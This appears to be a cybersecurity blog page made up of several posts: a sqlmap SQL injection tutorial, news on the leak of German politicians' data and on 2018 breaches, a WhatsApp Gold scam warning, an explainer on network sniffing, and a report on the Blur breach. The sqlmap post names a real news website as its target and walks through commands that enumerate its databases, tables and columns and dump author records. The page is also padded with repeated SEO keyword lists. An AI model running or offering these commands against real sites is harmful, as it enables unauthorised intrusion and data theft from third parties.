BREAKING NEWS
latest

ADS

ADS

Hacking Tools

Hacking Tools

SQLMAP Tutorial | Sql injection complete commands | Kali Linux

   SQLMAP Tutorial for Sql injection 

sql injection complete tutorial, error based sql injection, Double query sql injection, Union Sql injection, sqlmap complete commands, admin login bypass, boolean based sql injection, time based sql injection, blind sql injection, sqlmap complete tutorial cheat sheet, sqlmap tool tutorial.


SQLMAP is the kali linux tool for exploiting sql injection vulnerability in the websites.
Sqlmap can exploit both get method websites & post method websites. To exploit the websites using sqlmap websites should be vulnerable to sql injection.




 Vulnerable Urls

 Lets say there is a web application or website that has a url in it like this 
www.site.com/index.php?id=22
To check above get method url we put single quote on id parameter.
www.site.com/index.php?id=22'
To check the vulnerability, put single quote in the parameter. If this throws an error or reacts in an unexpected scenario. So in this case this website is vulnerable to sql injection.
Step 1:  check help section of sqlmap tool
root@kali:~# sqlmap -h


Step 2: fetching the databases of the website
root@kali:~#  sqlmap -u http://www.dailypakistan.pk/e-paper/newsdetail.php?id=9 --dbs

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N



Step 2: Fetch the Table Names 

root@kali:~# sqlmap -u http://www.dailypakistan.pk/e-paper/newsdetail.php?id=9 -D dailypak_dailypak --tables




Step 3 : Fetch the columns name 

root@kali:~# sqlmap -u http://www.dailypakistan.pk/e-paper/newsdetail.php?id=9 -D dailypak_dailypak -T author --columns



step 4: Fetch the Data 

root@kali:~# sqlmap -u http://www.dailypakistan.pk/e-paper/newsdetail.php?id=9 -D dailypak_dailypak -T author -C author_id,author_name,author_name_image --dump







Video Tutorial for sql injection :


sql injection complete tutorial, error based sql injection, Double query sql injection, Union Sql injection, sqlmap complete commands, admin login bypass, boolean based sql injection, time based sql injection, blind sql injection, sqlmap complete tutorial cheat sheet, sqlmap tool tutorial.





Germany Political Leaders have been hacked

Germany Political Leaders have been hacked


German Man Confesses to Hacking Politicians' Data,Angela Merkel and hundreds of German politicians hacked,Hundreds of German politicians hacked in massive data leak,German Politicians Targeted In Sweeping Hacking Attack,Police Say Hacking Suspect, 20, Confessed To Posting German,Suspect 20 arrested over massive German politician data hack,German politicians' data published online in massive breach,Hackers dump data of hundreds of German politicians on Twitter,Angela Merkel among hundreds of German politicians hacked,German politicians targeted in mass data attack,Russia Or The Far-Right,Who Hacked German Politic


Germany Political Leaders have been hacked, Germany data hack.
Hundreds of leaders in Germany have been hacked. Hackers have leaked personal information of these leaders and political parties. According to the media report, hackers have targeted the other parties except one party.


germany political leaders have been hacked




The report has claimed that personal documents of political parties and hundreds of German leaders have been leaked to the internet. The hackers have released documents from all the parties present in the German parliament, leaving AFD to the right-wing party. The provincial level leaders have also been hacked. The leaked documents were first detected on January 3, 2019.

This document was being leaked from the beginning of December 2018. They were being released from the Hamburg-based Twitter account. Twitter account tells itself as security research, artist and satirist. There is no specific pattern in leaked documents. At the moment there is no clue as well as hidden intentions and people.


Address in documents, mobile number included

Leaked documents include the addresses and mobile numbers of politicians. In some cases politicians' banks and finance information, ID cards and private chats have also been leaked. There is also a list of job applications, party memos and party members in it. Some of these documents are more than a year old.


German Man Confesses to Hacking Politicians' Data,Angela Merkel and hundreds of German politicians hacked,Hundreds of German politicians hacked in massive data leak,German Politicians Targeted In Sweeping Hacking Attack,Police Say Hacking Suspect, 20, Confessed To Posting German,Suspect 20 arrested over massive German politician data hack,German politicians' data published online in massive breach,Hackers dump data of hundreds of German politicians on Twitter,Angela Merkel among hundreds of German politicians hacked,German politicians targeted in mass data attack,Russia Or The Far-Right,Who Hacked German Politic






WhatsApp Gold is Back, Once again with the updated virus

WhatsApp Gold is Back, Once again with the updated virus

The new “WhatsApp Gold feature” is actually a hoax - Livemint, WhatsApp: What is WhatsApp Gold?, WhatsApp 'Martinelli' virus returns in 2019, WhatsApp 'Martinelli' virus returns in 2019,
WhatsApp 'Gold' Hoax: A Virus That You Should Not Download, WhatsApp 'Gold' Hoax: A Virus That You Should Not Download, WhatsApp Gold scam, Martinelli, Beware! That new WhatsApp Gold feature is a hoax - Technology News,What is the WhatsApp Gold virus and what to do if you are targeted, What is the WhatsApp Gold virus and what to do if you are targeted, There is nothing called WhatsApp Gold; it's just a virus, It Is A Virus: Do Not Download 'WhatsApp Gold'
Most Common WhatsApp Scams, Most Common WhatsApp Scams.


In the technology world day by day new interesting things comes, it might be related to adding new features to the WhatsApp, Facebook, Instagram or LinkedIn. 
Now a day If you are getting any link to download WhatsApp Gold, Be aware! It’s a scam. Don’t install WhatsApp Gold in the device It’s a Virus. In the scam message these things can be find in the message, like if you install this WhatsApp Gold in your device you can send photos to 100 people once & message can be deleted at any time.









But its fake, ignore these kind of message, this can be dangerous for your personal data.
The Officially said by WhatApp, they didn’t launch any such kind of new version of WhatApp. This WhatApp Gold Virus is spreading by hackers, if someone open this message, the phone will be infected with the virus and personal information will be leaked to the hackers.

Manish Kumawat, Director at Cryptus Cyber Security Pvt Ltd Commented, “ This is not the first time when hackers released this kind of updated version of WhatsApp, It has been happened before also. If anyone installed this virus in the phone, then should do factory data reset.

The new “WhatsApp Gold feature” is actually a hoax - Livemint, WhatsApp: What is WhatsApp Gold?, WhatsApp 'Martinelli' virus returns in 2019, WhatsApp 'Martinelli' virus returns in 2019,
WhatsApp 'Gold' Hoax: A Virus That You Should Not Download, WhatsApp 'Gold' Hoax: A Virus That You Should Not Download, WhatsApp Gold scam, Martinelli, Beware! That new WhatsApp Gold feature is a hoax - Technology News,What is the WhatsApp Gold virus and what to do if you are targeted, What is the WhatsApp Gold virus and what to do if you are targeted, There is nothing called WhatsApp Gold; it's just a virus, It Is A Virus: Do Not Download 'WhatsApp Gold'
Most Common WhatsApp Scams, Most Common WhatsApp Scams.



Ethical Hacking Sniffing Tools

Ethical Hacking Sniffing Tools 

Ethical Hacking Sniffing Tools, Wifi Sniffer: Tools for Detecting Packet Sniffers, Wifi Sniffer: Tools for Detecting Packet Sniffers, Wireless Sniffers – Sniffing Tools in Ethical Hacking,Active Sniffing Attacks | Ethical Hacking, Ethical Hacking Sniffing in Ethical Hacking Tutorial, What is Network Sniffing ? | Protect Business with Packet Sniffer, What is a sniffer in hacking?, ethical hacking sniffing training and certification in delhi, ethical hacking sniffing training and certification in delhi


Sniffing is a process of capturing and monitoring all the packets travelling around a specific network using some sniffing tools. It is a form of “tapping phone wires”, “listening someone call conversations” and get to know what exactly the conversation is going on. 




It is also called wiretapping applied to the computer networks.
The switch ports if open which are used in large enterprise, then any employee or internal intruder can sniff the whole traffic of the network. It is in the same physical location can plug into the network using Ethernet cable or connect wirelessly to that network and sniff the total traffic without knowing anyone or System Admin.


What can be sniffed?
Our confidential information of network one can sniff:-
1.      Email traffic
2.     Telnet password

   Ethical Hacking Course in Delhi

3.     Web traffics
4.     Router and switch configuration
5.     FTP passwords
6.     DNS traffics
How it works?
A promiscuous mode refers to the unique way of Ethernet hardware, in particular, network interface cards (NICs), that allows an NIC to receive all traffic on the network, even if it is not addressed to this NIC. By default, a NIC ignores all traffic that is not addressed to it, which is done by comparing the destination address of the Ethernet packet with the hardware address (MAC address) of the device. While this makes perfect sense for networking, non-promiscuous mode makes it difficult to use network monitoring and analysis software for diagnosing connectivity issues or traffic accounting.


Type of Sniffing: 
Passive Sniffing
In passive sniffing, the traffic is locked but it is not altered in any way. Passive sniffing allows listening only. It works with Hub devices. On a hub device, the traffic is sent to all the ports. In a network that uses hubs to connect systems, all hosts on the network can see the traffic. Therefore, an attacker can easily capture traffic going through.
The good news is that hubs are almost obsolete nowadays. Most modern networks use switches. Hence, passive sniffing is no more effective.

Cyber Security Course in india 

Active Sniffing
In active sniffing, the traffic is not only locked and monitored, but it may also be altered in some way as determined by the attack. Active sniffing is used to sniff a switch-based network. It involves injecting address resolution packets(ARP) into a target network to flood on the switch content addressable memory(CAM) table. CAM keeps track of which host is connected to which port.
Following are the Active Sniffing Techniques −
  • MAC Flooding
  • DHCP Attacks
  • DNS Poisoning
  • Spoofing Attacks
  • ARP Poisoning

Protocols which are affected

Protocols such as the tried and true TCP/IP were never designed with security in mind and therefore do not offer much resistance to potential intruders. Several rules lend themselves to easy sniffing −
·      HTTP− It is used to send information in the clear text without any encryption and thus a real target.
·      SMTP(Simple Mail Transfer Protocol) − SMTP is basically utilized in the transfer of emails. This protocol is efficient, but it does not include any protection against sniffing.
·      NNTP(Network News Transfer Protocol) − It is used for all types of communications, but its main drawback is that data and even passwords are sent over the network as clear text.
·      POP(Post Office Protocol) − POP is strictly used to receive emails from the servers. This protocol does not include protection against sniffing because it can be trapped.
·      FTP(File Transfer Protocol) − FTP is used to send and receive files, but it does not offer any security features. All the data is sent as clear text that can be easily sniffed.
·      IMAP(Internet Message Access Protocol) − IMAP is same as SMTP in its functions, but it is highly vulnerable to sniffing.
·      Telnet− Telnet sends everything (usernames, passwords, keystrokes) over the network as clear text and hence, it can be easily sniffed.
Sniffers are not the dumb utilities that allow you to view only live traffic. If you really want to analyse each packet, save the capture and review it whenever time allows.


Tools for Sniffing:
1.     Solar Winds Packet Analysis Bundle.
2.    Wireshark
3.    PRTG Network Monitor
4.    Steel central Packet Analyzer
5.    Tcpdump
6.    Network Miner
7.    Kismet
8.    Fiddler


Ethical Hacking Sniffing Tools, Wifi Sniffer: Tools for Detecting Packet Sniffers, Wifi Sniffer: Tools for Detecting Packet Sniffers, Wireless Sniffers – Sniffing Tools in Ethical Hacking,Active Sniffing Attacks | Ethical Hacking, Ethical Hacking Sniffing in Ethical Hacking Tutorial, What is Network Sniffing ? | Protect Business with Packet Sniffer, What is a sniffer in hacking?, ethical hacking sniffing training and certification in delhi, ethical hacking sniffing training and certification in delhi

Top 5 biggest Data breaches in 2018

Top 5 biggest Data breaches in 2018

10 of the Biggest Data Breaches in 2018, 10 of the Biggest Data Breaches in 2018, Biggest data breaches of 2018, The 21 biggest data breaches of 2018, Biggest cyber security breaches 2018,The 18 biggest data breaches of the 21st century,Breaking Down Five 2018 Breaches, What we can learn from the biggest 2018 data breaches, The Biggest Data Breaches in ASEAN 2019,
World's Biggest Data Breaches & Hacks, The Worst Cybersecurity Breaches of 2018


TOP 5 Biggest data Breach in year 2018, These data breaches happens due to Critical Bugs in the infrastructure, Every organisations should aware about these kind of bugs. Organisations should updated their security assets.



The exposed data which contains sensitive information that was linked in CPF includes banks, loans, credit and debit history, voting information, full name, email Id’s, residential addresses, contract numbers and amounts.
All the above confidential data was breached through CPF, around 120 million Unique CPF Brazilian citizens was exposed online form, it was a misconfigured Apache server threat that becomes a critical risk and easy to exploit by the Hackers. And the highly sensitive data is available open for everyone on Internet.
Quora Hacked
A highly intense platform for questioning and answering to people is been hacked. A platform where anyone can get their questions solutions and put their queries. Here we make an account for getting more services from Quora or we can put our answer and questioning as an anonymously. 
But, the Hacker gained unauthorised access to the servers and stolen account information like Username and Password, public content and actions and some non-public data. As per Quora around 100 million user’s accounts was exposed.

MyFitnessPal

The day was 25thMarch, 2018 becomes a dooms day for MyFitnessPal as they had a biggest Data Breach affected more than 150 million user accounts. 
Actually the breach was occurred in February 2017, but the company identified the unauthorized data access from their server on 25thMarch in 2018. 

The attackers stolen the usernames, email addresses, and Hashed passwords. So, after identification of breach, the company send notification to their customers “to change their passwords immediately” through email’s. 
As per MyFitnessPal, they said “We continue to monitor for suspicious activity and to coordinate with law enforcement authorities. We continue to make enhancements to our systems to detect and prevent unauthorized access to user information”.

Exactis
Leaked information contains millions of people personal sensitive phone numbers, email addresses, home addresses, even how many children have to the parents also leaked. 
A Marketing Firm Exactis was exposed around more than 340 million Americans confidential records Online which is estimated more the Equifax data breach that was also occurred before few months ago.
It was discovered by a security researcher Vinny Troia that nearly 340 million individual American’s records on public accessible server.

Starwood Hotels
Marriot identified the intrusion on 10thSeptember 2018, after receiving an alert from their internal security testing tool. The hotel chain worked on the cause of vulnerability was exploited by the hacker with security experts. 


As per Marriott International announced a security breach that affected more than a 500 million guests who was taken reservation in Starwood Hotels and Resorts. As per Marriott investigation, they get knowledge that the hackers get unauthorized access of Starwood database and network since 2014, they copied it and encrypt the information and removed it. 
Lots of effort taken by investigation team and on 19thNovember, 2018 they managed to decrypt the information that was leaked by the hackers and identified the duplicate data to delete it.


“We deeply regret this incident happened,” said Arne Sorenson, Marriott’s President, and Chief Executive Officer. “We fell short of what our guests deserve and what we expect of ourselves. We are doing everything we can to support our guests, and using lessons learned to be better moving forward.”

10 of the Biggest Data Breaches in 2018, 10 of the Biggest Data Breaches in 2018, Biggest data breaches of 2018, The 21 biggest data breaches of 2018, Biggest cyber security breaches 2018,The 18 biggest data breaches of the 21st century,Breaking Down Five 2018 Breaches, What we can learn from the biggest 2018 data breaches, The Biggest Data Breaches in ASEAN 2019,
World's Biggest Data Breaches & Hacks, The Worst Cybersecurity Breaches of 2018

DATA OF 2.4 million blur password manager users left exposed online

Blur password manager Data Breach

Blur password manager is a service that is used to increases a user’s privacy by offering password management, masked phone number, masked credit card, and masked email addresses so that you do not need to expose your sensitive information online



Abine, the creator of Blur password manager, that provides privacy protection service, revelled data breach of nearly 2.4 million Blur users.

.
 Abine Blur lets user’s shop online without revealing your actual email address, phone number, or credit card number, and it manages your passwords, too.
When a security researcher contacted the company about a server that exposed a file containing sensitive information about Blur users, Abine spokesperson told ZdNet via email
The Abine creator of Blur password manager, said they initial report with an internal security audit to determine the size of the breach. 
According to Abine, the file that was left freely accessible online contained various details about Blur users who registered before jan 6, 2018.exposed information included:
·     Users email addresses

   Ethical Hacking Course in india

·     Some users first and last names


·     Each users last and second-to-last IP addresses used to login to blur
·     Each user’s encrypted Blur password. These encrypted passwords are encrypted and hashed before they are transmitted to our servers, and they are then encrypted using bcrypt with a unique salt for every user. The output of this encryption process for these users was potentially exposed, not actual user passwords.
Abine said that there is no evidence that any sensitive data such as customer’s payment information, stored masked email or phone numbers were exposed.
To be safe, Abine is requesting users to change their Blur master password and enable two-factor authentication for their account .
“as a privacy and security focused company this incident is embarrassing and frustrating” Abine said.